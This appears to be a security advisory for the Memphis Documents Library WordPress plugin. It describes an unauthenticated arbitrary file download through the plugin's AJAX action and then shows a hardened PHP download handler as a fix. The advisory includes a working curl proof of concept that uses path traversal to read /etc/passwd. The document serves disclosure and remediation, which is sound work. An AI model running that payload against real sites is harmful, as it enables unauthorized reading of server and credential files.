Memphis Documents Library [Unauthenticated Arbitrary File Download]
The Memphis Documents Library plugin registers an AJAX action that
provides a convenient way to execute many of the plugin's functions.
Nearly all of the functions exposed through this hook lack proper
input validation, capability checks, output escaping, etc.
At least one of the functions provided by this AJAX action can be used to download arbitrary files from the server.
curl 'http://sbwp2.dev/wp-admin/admin-ajax.php' \
  -d 'action=myajax-submit&type=mdocs-export&zip-file=/../etc/passwd'
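For comparison, a download handler with the checks described above as missing, written as an added example and not taken from the plugin's code. The names example_export_download and example_resolve_export, the nonce action, the example-exports directory and the manage_options capability are assumptions, as is the premise that zip-file is meant to name an archive inside a single export directory.

```php
<?php
// Added example with hypothetical names; not the plugin's own code.
// Assumption: export archives live in one directory under uploads.
// Register only the authenticated hook. Without a wp_ajax_nopriv_
// counterpart, anonymous requests never reach the handler.
add_action( 'wp_ajax_example_export_download', 'example_export_download' );

function example_export_download() {
    // Capability check: being logged in is not enough.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // CSRF check against a nonce issued with the admin page.
    check_ajax_referer( 'example_export_download', 'nonce' );

    $requested = isset( $_POST['zip-file'] ) ? wp_unslash( $_POST['zip-file'] ) : '';
    $path      = example_resolve_export( $requested );
    if ( false === $path ) {
        wp_die( 'Not found', '', array( 'response' => 404 ) );
    }
    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}

// Returns the canonical path of an export archive, or false if the
// request names anything outside the export directory.
function example_resolve_export( $requested ) {
    $upload = wp_upload_dir();
    $base   = realpath( $upload['basedir'] . '/example-exports' );
    if ( false === $base || ! is_string( $requested ) ) {
        return false;
    }
    // Keep only the final path component, and only *.zip names.
    $name = basename( str_replace( '\\', '/', $requested ) );
    if ( ! preg_match( '/\A[A-Za-z0-9._-]+\.zip\z/', $name ) ) {
        return false;
    }
    // Canonicalise (resolves symlinks and ..) and confirm containment.
    $real = realpath( $base . '/' . $name );
    if ( false === $real || 0 !== strpos( $real, $base . DIRECTORY_SEPARATOR ) || ! is_file( $real ) ) {
        return false;
    }
    return $real;
}
```

With these checks, the zip-file value from the request above reduces to the name passwd, fails the *.zip pattern, and the handler answers 404 without touching the filesystem.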